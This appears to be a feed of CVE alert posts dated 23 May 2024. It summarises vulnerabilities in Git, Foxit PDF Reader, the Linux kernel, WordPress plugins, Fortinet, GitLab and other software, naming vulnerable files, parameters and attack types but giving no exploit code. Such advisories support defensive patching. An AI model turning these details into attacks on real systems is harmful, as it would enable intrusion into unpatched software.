🚨 CVE-2024-34906An arbitrary file upload vulnerability in dootask v0.30.13 allows attackers to execute arbitrary code via uploading a crafted PDF file.🎖@cveNotify |
|
| 2024-05-23 21:07:24 |
🚨 CVE-2024-32002Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, repositories with submodules can be crafted in a way that exploits a bug in Git whereby it can be fooled into writing files not into the submodule's worktree but into a `.git/` directory. This allows writing a hook that will be executed while the clone operation is still running, giving the user no opportunity to inspect the code that is being executed. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. If symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. As always, it is best to avoid cloning repositories from untrusted sources.🎖@cveNotify |
|
| 2024-05-23 20:37:31 |
🚨 CVE-2023-42097Foxit PDF Reader Annotation Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-21902.🎖@cveNotify |
|
| 2024-05-23 20:37:30 |
🚨 CVE-2023-42095Foxit PDF Reader AcroForm Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Annotation objects. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-21879.🎖@cveNotify |
|
| 2024-05-23 20:37:26 |
🚨 CVE-2023-42093Foxit PDF Reader Annotation Use-After-Free Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-21869.🎖@cveNotify |
|
| 2024-05-23 20:37:25 |
🚨 CVE-2023-42090Foxit PDF Reader XFA Doc Object Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Doc objects. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-21596.🎖@cveNotify |
|
| 2024-05-23 20:07:25 |
🚨 CVE-2023-43208NextGen Healthcare Mirth Connect before version 4.4.1 is vulnerable to unauthenticated remote code execution. Note that this vulnerability is caused by the incomplete patch of CVE-2023-37679.🎖@cveNotify |
|
| 2024-05-23 20:07:24 |
🚨 CVE-2020-17519A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit b561010b0ee741543c3953306037f00d7a9f0801 from apache/flink:master.🎖@cveNotify |
|
| 2024-05-23 19:37:26 |
🚨 CVE-2024-26932In the Linux kernel, the following vulnerability has been resolved:usb: typec: tcpm: fix double-free issue in tcpm_port_unregister_pd()When unregister pd capabilitie in tcpm, KASAN will capture below double-free issue. The root cause is the same capabilitiy will be kfreed twice,the first time is kfreed by pd_capabilities_release() and the second timeis explicitly kfreed by tcpm_port_unregister_pd().[ 3.988059] BUG: KASAN: double-free in tcpm_port_unregister_pd+0x1a4/0x3dc[ 3.995001] Free of addr ffff0008164d3000 by task kworker/u16:0/10[ 4.001206][ 4.002712] CPU: 2 PID: 10 Comm: kworker/u16:0 Not tainted 6.8.0-rc5-next-20240220-05616-g52728c567a55 #53[ 4.012402] Hardware name: Freescale i.MX8QXP MEK (DT)[ 4.017569] Workqueue: events_unbound deferred_probe_work_func[ 4.023456] Call trace:[ 4.025920] dump_backtrace+0x94/0xec[ 4.029629] show_stack+0x18/0x24[ 4.032974] dump_stack_lvl+0x78/0x90[ 4.036675] print_report+0xfc/0x5c0[ 4.040289] kasan_report_invalid_free+0xa0/0xc0[ 4.044937] __kasan_slab_free+0x124/0x154[ 4.049072] kfree+0xb4/0x1e8[ 4.052069] tcpm_port_unregister_pd+0x1a4/0x3dc[ 4.056725] tcpm_register_port+0x1dd0/0x2558[ 4.061121] tcpci_register_port+0x420/0x71c[ 4.065430] tcpci_probe+0x118/0x2e0To fix the issue, this will remove kree() from tcpm_port_unregister_pd().🎖@cveNotify |
|
| 2024-05-23 19:37:25 |
🚨 CVE-2024-26929In the Linux kernel, the following vulnerability has been resolved:scsi: qla2xxx: Fix double free of fcportThe server was crashing after LOGO because fcport was getting freed twice. -----------[ cut here ]----------- kernel BUG at mm/slub.c:371! invalid opcode: 0000 1 SMP PTI CPU: 35 PID: 4610 Comm: bash Kdump: loaded Tainted: G OE --------- - - 4.18.0-425.3.1.el8.x86_64 #1 Hardware name: HPE ProLiant DL360 Gen10/ProLiant DL360 Gen10, BIOS U32 09/03/2021 RIP: 0010:set_freepointer.part.57+0x0/0x10 RSP: 0018:ffffb07107027d90 EFLAGS: 00010246 RAX: ffff9cb7e3150000 RBX: ffff9cb7e332b9c0 RCX: ffff9cb7e3150400 RDX: 0000000000001f37 RSI: 0000000000000000 RDI: ffff9cb7c0005500 RBP: fffff693448c5400 R08: 0000000080000000 R09: 0000000000000009 R10: 0000000000000000 R11: 0000000000132af0 R12: ffff9cb7c0005500 R13: ffff9cb7e3150000 R14: ffffffffc06990e0 R15: ffff9cb7ea85ea58 FS: 00007ff6b79c2740(0000) GS:ffff9cb8f7ec0000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000055b426b7d700 CR3: 0000000169c18002 CR4: 00000000007706e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 PKRU: 55555554 Call Trace: kfree+0x238/0x250 qla2x00_els_dcmd_sp_free+0x20/0x230 [qla2xxx] ? qla24xx_els_dcmd_iocb+0x607/0x690 [qla2xxx] qla2x00_issue_logo+0x28c/0x2a0 [qla2xxx] ? qla2x00_issue_logo+0x28c/0x2a0 [qla2xxx] ? kernfs_fop_write+0x11e/0x1a0Remove one of the free calls and add check for valid fcport. Also usefunction qla2x00_free_fcport() instead of kfree().🎖@cveNotify |
|
| 2024-05-23 19:07:25 |
🚨 CVE-2024-28978Dell OpenManage Enterprise, versions 3.10 and 4.0, contains an Improper Access Control vulnerability. A high privileged remote attacker could potentially exploit this vulnerability, leading to unauthorized access to resources.🎖@cveNotify |
|
| 2024-05-23 19:07:24 |
🚨 CVE-2022-48654In the Linux kernel, the following vulnerability has been resolved:netfilter: nfnetlink_osf: fix possible bogus match in nf_osf_find()nf_osf_find() incorrectly returns true on mismatch, this leads tocopying uninitialized memory area in nft_osf which can be used to leakstale kernel stack data to userspace.🎖@cveNotify |
|
| 2024-05-23 18:37:26 |
🚨 CVE-2024-3272** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as very critical, has been found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. This issue affects some unknown processing of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument user with the input messagebus leads to hard-coded credentials. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259283. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-05-23 18:37:25 |
🚨 CVE-2023-43208NextGen Healthcare Mirth Connect before version 4.4.1 is vulnerable to unauthenticated remote code execution. Note that this vulnerability is caused by the incomplete patch of CVE-2023-37679.🎖@cveNotify |
|
| 2024-05-23 18:37:24 |
🚨 CVE-2022-38028Windows Print Spooler Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-05-23 18:07:46 |
🚨 CVE-2021-47164In the Linux kernel, the following vulnerability has been resolved:net/mlx5e: Fix null deref accessing lag devIt could be the lag dev is null so stop processing the event.In bond_enslave() the active/backup slave being set before setting theupper dev so first event is without an upper dev.After setting the upper dev with bond_master_upper_dev_link() there isa second event and in that event we have an upper dev.🎖@cveNotify |
|
| 2024-05-23 18:07:45 |
🚨 CVE-2024-23296A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 17.4 and iPadOS 17.4. An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple is aware of a report that this issue may have been exploited.🎖@cveNotify |
|
| 2024-05-23 18:07:41 |
🚨 CVE-2024-23225A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 16.7.6 and iPadOS 16.7.6, iOS 17.4 and iPadOS 17.4. An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple is aware of a report that this issue may have been exploited.🎖@cveNotify |
|
| 2024-05-23 18:07:40 |
🚨 CVE-2024-27198In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible🎖@cveNotify |
|
| 2024-05-23 18:07:39 |
🚨 CVE-2023-41993The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.🎖@cveNotify |
|
| 2024-05-23 18:07:38 |
🚨 CVE-2023-3603A missing allocation check in sftp server processing read requests may cause a NULL dereference on low-memory conditions. The malicious client can request up to 4GB SFTP reads, causing allocation of up to 4GB buffers, which was not being checked for failure. This will likely crash the authenticated user's sftp server connection (if implemented as forking as recommended). For thread-based servers, this might also cause DoS for legitimate users.Given this code is not in any released versions, no security releases have been issued.🎖@cveNotify |
|
| 2024-05-23 18:07:34 |
🚨 CVE-2019-7256Linear eMerge E3-Series devices allow Command Injections.🎖@cveNotify |
|
| 2024-05-23 18:07:33 |
🚨 CVE-2018-5730MIT krb5 1.6 or later allows an authenticated kadmin with permission to add principals to an LDAP Kerberos database to circumvent a DN containership check by supplying both a "linkdn" and "containerdn" database argument, or by supplying a DN string which is a left extension of a container DN string but is not hierarchically within the container DN.🎖@cveNotify |
|
| 2024-05-23 18:07:32 |
🚨 CVE-2018-5729MIT krb5 1.6 or later allows an authenticated kadmin with permission to add principals to an LDAP Kerberos database to cause a denial of service (NULL pointer dereference) or bypass a DN container check by supplying tagged data that is internal to the database module.🎖@cveNotify |
|
| 2024-05-23 17:37:32 |
🚨 CVE-2024-33525A Stored Cross-site Scripting (XSS) vulnerability in the "Import of organizational units and title of organizational unit" feature in ILIAS 7.20 to 7.29 and ILIAS 8.4 to 8.10 as well as ILIAS 9.0 allows remote authenticated attackers with administrative privileges to inject arbitrary web script or HTML via XML file upload.🎖@cveNotify |
|
| 2024-05-23 17:37:26 |
🚨 CVE-2024-33529ILIAS 7 before 7.30 and ILIAS 8 before 8.11 as well as ILIAS 9.0 allow remote authenticated attackers with administrative privileges to execute operating system commands via file uploads with dangerous types.🎖@cveNotify |
|
| 2024-05-23 17:37:25 |
🚨 CVE-2024-33526A Stored Cross-site Scripting (XSS) vulnerability in the "Import of user role and title of user role" feature in ILIAS 7 before 7.30 and ILIAS 8 before 8.11 allows remote authenticated attackers with administrative privileges to inject arbitrary web script or HTML via XML file upload.🎖@cveNotify |
|
| 2024-05-23 17:37:24 |
🚨 CVE-2024-3019A flaw was found in PCP. The default pmproxy configuration exposes the Redis server backend to the local network, allowing remote command execution with the privileges of the Redis user. This issue can only be exploited when pmproxy is running. By default, pmproxy is not running and needs to be started manually. The pmproxy service is usually started from the 'Metrics settings' page of the Cockpit web interface. This flaw affects PCP versions 4.3.4 and newer.🎖@cveNotify |
|
| 2024-05-23 17:07:24 |
🚨 CVE-2023-40720An authorization bypass through user-controlled key vulnerability [CWE-639] in FortiVoiceEntreprise version 7.0.0 through 7.0.1 and before 6.4.8 allows an authenticated attacker to read the SIP configuration of other users via crafted HTTP or HTTPS requests.🎖@cveNotify |
|
| 2024-05-23 16:07:37 |
🚨 CVE-2024-30005Windows Mobile Broadband Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-05-23 16:07:36 |
🚨 CVE-2024-30004Windows Mobile Broadband Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-05-23 16:07:35 |
🚨 CVE-2024-30003Windows Mobile Broadband Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-05-23 16:07:32 |
🚨 CVE-2024-30002Windows Mobile Broadband Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-05-23 16:07:31 |
🚨 CVE-2024-30000Windows Mobile Broadband Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-05-23 16:07:30 |
🚨 CVE-2024-29998Windows Mobile Broadband Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-05-23 16:07:26 |
🚨 CVE-2024-23105A Use Of Less Trusted Source [CWE-348] vulnerability in Fortinet FortiPortal version 7.0.0 through 7.0.6 and version 7.2.0 through 7.2.1 allows an unauthenticated attack to bypass IP protection through crafted HTTP or HTTPS packets.🎖@cveNotify |
|
| 2024-05-23 16:07:25 |
🚨 CVE-2023-46714A stack-based buffer overflow [CWE-121] vulnerability in Fortinet FortiOS version 7.2.1 through 7.2.6 and version 7.4.0 through 7.4.1 allows a privileged attacker over the administrative interface to execute arbitrary code or commands via crafted HTTP or HTTPs requests.🎖@cveNotify |
|
| 2024-05-23 16:07:24 |
🚨 CVE-2023-45586An insufficient verification of data authenticity vulnerability [CWE-345] in Fortinet FortiOS SSL-VPN tunnel mode version 7.4.0 through 7.4.1, version 7.2.0 through 7.2.7 and before 7.0.12 & FortiProxy SSL-VPN tunnel mode version 7.4.0 through 7.4.1, version 7.2.0 through 7.2.7 and before 7.0.13 allows an authenticated VPN user to send (but not receive) packets spoofing the IP of another user via crafted network packets.🎖@cveNotify |
|
| 2024-05-23 15:37:28 |
🚨 CVE-2024-5084The Hash Form – Drag & Drop Form Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'file_upload_action' function in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-05-23 15:37:27 |
🚨 CVE-2024-4947Type Confusion in V8 in Google Chrome prior to 125.0.6422.60 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-23 13:37:27 |
🚨 CVE-2024-4471The 140+ Widgets | Best Addons For Elementor – FREE for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.4.3.1 via deserialization of untrusted input in the 'export_content' function. This allows authenticated attackers, with contributor-level permissions and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.Thanks,Francesco🎖@cveNotify |
|
| 2024-05-23 13:37:26 |
🚨 CVE-2024-35197gitoxide is a pure Rust implementation of Git. On Windows, fetching refs that clash with legacy device names reads from the devices, and checking out paths that clash with such names writes arbitrary data to the devices. This allows a repository, when cloned, to cause indefinite blocking or the production of arbitrary message that appear to have come from the application, and potentially other harmful effects under limited circumstances. If Windows is not used, or untrusted repositories are not cloned or otherwise used, then there is no impact. A minor degradation in availability may also be possible, such as with a very large file named `CON`, though the user could interrupt the application.🎖@cveNotify |
|
| 2024-05-23 13:37:25 |
🚨 CVE-2024-1803The EmbedPress – Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to unauthorized access of functionality due to insufficient authorization validation on the PDF embed block in all versions up to, and including, 3.9.12. This makes it possible for authenticated attackers, with contributor-level access and above, to embed PDF blocks.🎖@cveNotify |
|
| 2024-05-23 13:07:40 |
🚨 CVE-2024-22026A local privilege escalation vulnerability in EPMM before 12.1.0.0 allows an authenticated local user to bypass shell restriction and execute arbitrary commands on the appliance.🎖@cveNotify |
|
| 2024-05-23 12:37:36 |
🚨 CVE-2024-28188Jupyter Scheduler is collection of extensions for programming jobs to run now or run on a schedule. The list of conda environments of `jupyter-scheduler` users maybe be exposed, potentially revealing information about projects that a specific user may be working on. This vulnerability has been patched in version(s) 1.1.6, 1.2.1, 1.8.2 and 2.5.2.🎖@cveNotify |
|
| 2024-05-23 12:37:35 |
🚨 CVE-2024-26139OpenCTI is an open source platform allowing organizations to manage their cyber threat intelligence knowledge and observables. Due to lack of certain security controls on the profile edit functionality, an authenticated attacker with low privileges can gain administrative privileges on the web application.🎖@cveNotify |
|
| 2024-05-23 11:37:32 |
🚨 CVE-2024-5258An authorization vulnerability exists within GitLab from versions 16.10 before 16.10.6, 16.11 before 16.11.3, and 17.0 before 17.0.1 where an authenticated attacker could utilize a crafted naming convention to bypass pipeline authorization logic.🎖@cveNotify |
|
| 2024-05-23 11:37:31 |
🚨 CVE-2024-4378The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's menu and shape widgets in all versions up to, and including, 4.10.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-23 11:37:30 |
🚨 CVE-2024-3997The Prime Slider – Addons For Elementor (Revolution of a slider, Hero Slider, Ecommerce Slider) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Pagepiling widget in all versions up to, and including, 3.14.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-23 11:37:26 |
🚨 CVE-2024-1815The Spectra – WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Gallery block in all versions up to, and including, 2.12.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-23 11:37:25 |
🚨 CVE-2023-7045A CSRF vulnerability exists within GitLab CE/EE from versions 13.11 before 16.10.6, from 16.11 before 16.11.3, from 17.0 before 17.0.1. By leveraging this vulnerability, an attacker could exfiltrate anti-CSRF tokens via the Kubernetes Agent Server (KAS).🎖@cveNotify |
|
| 2024-05-23 11:37:24 |
🚨 CVE-2023-6502A Denial of Service (DoS) condition has been discovered in GitLab CE/EE affecting all versions before 16.10.6, version 16.11 before 16.11.3, and 17.0 before 17.0.1. It is possible for an attacker to cause a denial of service using a crafted wiki page.🎖@cveNotify |
|
| 2024-05-23 10:38:07 |
🚨 CVE-2024-5165In Eclipse Ditto versions 3.0.0 to 3.5.5, the user input of several input fields of the Eclipse Ditto Explorer User Interface https://eclipse.dev/ditto/user-interface.html was not properly neutralized and thus vulnerable to both Reflected and Stored XSS (Cross Site Scripting).Several inputs were not persisted at the backend of Eclipse Ditto, but only in local browser storage to save settings of "environments" of the UI and e.g. the last performed "search queries", resulting in a "Reflected XSS" vulnerability.However, several other inputs were persisted at the backend of Eclipse Ditto, leading to a "Stored XSS" vulnerability. Those mean that authenticated and authorized users at Eclipse Ditto can persist Things in Ditto which can - when being displayed by other users also being authorized to see those Things in the Eclipse Ditto UI - cause scripts to be executed in the browser of other users.🎖@cveNotify |
|
| 2024-05-23 10:38:06 |
🚨 CVE-2024-2861The ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ProfilePress User Panel widget in all versions up to, and including, 4.15.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-23 09:37:40 |
🚨 CVE-2024-5264Network Transfer with AES KHT in Thales Luna EFT 2.1 and above allows a user with administrative console access to access backups taken via offline analysis🎖@cveNotify |
|
| 2024-05-23 09:37:36 |
🚨 CVE-2024-35223Dapr is a portable, event-driven, runtime for building distributed applications across cloud and edge. Dapr sends the app token of the invoker app instead of the app token of the invoked app. This causes of a leak of the application token of the invoker app to the invoked app when using Dapr as a gRPC proxy for remote service invocation. This vulnerability impacts Dapr users who use Dapr as a gRPC proxy for remote service invocation as well as the Dapr App API token functionality. An attacker could exploit this vulnerability to gain access to the app token of the invoker app, potentially compromising security and authentication mechanisms. This vulnerability was patched in version 1.13.3.🎖@cveNotify |
|
| 2024-05-23 09:37:35 |
🚨 CVE-2024-32969vantage6 is an open-source infrastructure for privacy preserving analysis. Collaboration administrators can add extra organizations to their collaboration that can extend their influence. For example, organizations that they include can then create new users for which they know the passwords, and use that to read task results of other collaborations that that organization is involved in. This is only relatively trusted users - with access to manage a collaboration - are able to do this, which reduces the impact. This vulnerability was patched in version 4.5.0rc3.🎖@cveNotify |
|
| 2024-05-23 09:37:34 |
🚨 CVE-2024-30279Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-05-23 08:37:24 |
🚨 CVE-2024-4706The WordPress + Microsoft Office 365 / Azure AD | LOGIN plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'pintra' shortcode in all versions up to, and including, 27.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-23 07:37:27 |
🚨 CVE-2024-2874An issue has been discovered in GitLab CE/EE affecting all versions before 16.10.6, version 16.11 before 16.11.3, and 17.0 before 17.0.1. A runner registered with a crafted description has the potential to disrupt the loading of targeted GitLab web resources.🎖@cveNotify |
|
| 2024-05-23 07:37:26 |
🚨 CVE-2024-2038The Visual Website Collaboration, Feedback & Project Management – Atarim plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 3.22.6. This is due to the use of hardcoded credentials to authenticate all the incoming API requests. This makes it possible for unauthenticated attackers to modify plugin settings, delete posts, modify post titles, and upload images.🎖@cveNotify |
|
| 2024-05-23 06:37:37 |
🚨 CVE-2024-5238A vulnerability, which was classified as critical, was found in Campcodes Complete Web-Based School Management System 1.0. This affects an unknown part of the file /view/timetable_insert_form.php. The manipulation of the argument grade leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265989 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-23 06:37:36 |
🚨 CVE-2024-5177The Hash Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'url' parameter within multiple widgets in all versions up to, and including, 1.3.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-23 06:37:32 |
🚨 CVE-2024-4399The does not validate a parameter before making a request to it, which could allow unauthenticated users to perform SSRF attack🎖@cveNotify |
|
| 2024-05-23 06:37:31 |
🚨 CVE-2024-3920The Flattr WordPress plugin through 1.2.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-05-23 06:37:30 |
🚨 CVE-2024-3918The Pet Manager WordPress plugin through 1.4 does not sanitise and escape some of its Pet settings, which could allow high privilege users such as Contributor to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2024-05-23 06:37:26 |
🚨 CVE-2024-3626The Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_template_content function in all versions up to, and including, 5.7.17. This makes it possible for authenticated attackers, with subscriber access and above, to obtain the contents of private and password-protected posts.🎖@cveNotify |
|
| 2024-05-23 06:37:25 |
🚨 CVE-2024-3594The IDonate WordPress plugin through 1.9.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-05-23 06:37:24 |
🚨 CVE-2024-2220The Button contact VR WordPress plugin through 4.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-05-23 05:37:30 |
🚨 CVE-2024-5236A vulnerability classified as critical was found in Campcodes Complete Web-Based School Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /view/teacher_salary_invoice1.php. The manipulation of the argument date leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-265987.🎖@cveNotify |
|
| 2024-05-23 05:37:26 |
🚨 CVE-2024-5234A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /view/teacher_salary_history1.php. The manipulation of the argument index leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265985 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-23 05:37:25 |
🚨 CVE-2024-4662The Oxygen Builder plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.8.2 via post metadata. This is due to the plugin storing custom data in post metadata without an underscore prefix. This makes it possible for lower privileged users, such as contributors, to inject arbitrary PHP code via the WordPress user interface and gain elevated privileges.🎖@cveNotify |
|
| 2024-05-23 05:37:24 |
🚨 CVE-2023-6325The RomethemeForm For Elementor plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the export_entries, rtformnewform, and rtformupdate functions in all versions up to, and including, 1.1.5. This makes it possible for unauthenticated attackers to export arbitrary form submissions, create new forms, or update any post title or certain metadata.🎖@cveNotify |
|
| 2024-05-23 04:37:25 |
🚨 CVE-2024-5232A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been classified as critical. This affects an unknown part of the file /view/teacher_salary_details2.php. The manipulation of the argument index leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-265983.🎖@cveNotify |
|
| 2024-05-23 04:37:24 |
🚨 CVE-2024-4431The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘id’ parameter in all versions up to, and including, 1.3.7.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-23 03:37:25 |
🚨 CVE-2024-5231A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /view/teacher_salary_details.php. The manipulation of the argument index leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-265982 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-23 03:37:24 |
🚨 CVE-2024-4895The wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the CSV import functionality in all versions up to, and including, 3.4.2.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-23 02:37:31 |
🚨 CVE-2024-5230A vulnerability has been found in EnvaySoft FleetCart up to 4.1.1 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument razorpayKeyId leads to information disclosure. The attack can be launched remotely. It is recommended to upgrade the affected component. The identifier VDB-265981 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-23 02:37:30 |
🚨 CVE-2024-4978Justice AV Solutions Viewer Setup 8.3.7.250-1 contains a malicious binary when executed and is signed with an unexpected authenticode signature. A remote, privileged threat actor may exploit this vulnerability to execute of unauthorized PowerShell commands.🎖@cveNotify |
|
| 2024-05-23 02:37:29 |
🚨 CVE-2024-4783The jQuery T(-) Countdown Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's tminus shortcode in all versions up to, and including, 2.3.25 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-23 02:37:26 |
🚨 CVE-2024-4486The Awesome Contact Form7 for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'AEP Contact Form 7' widget in all versions up to, and including, 2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-23 02:37:25 |
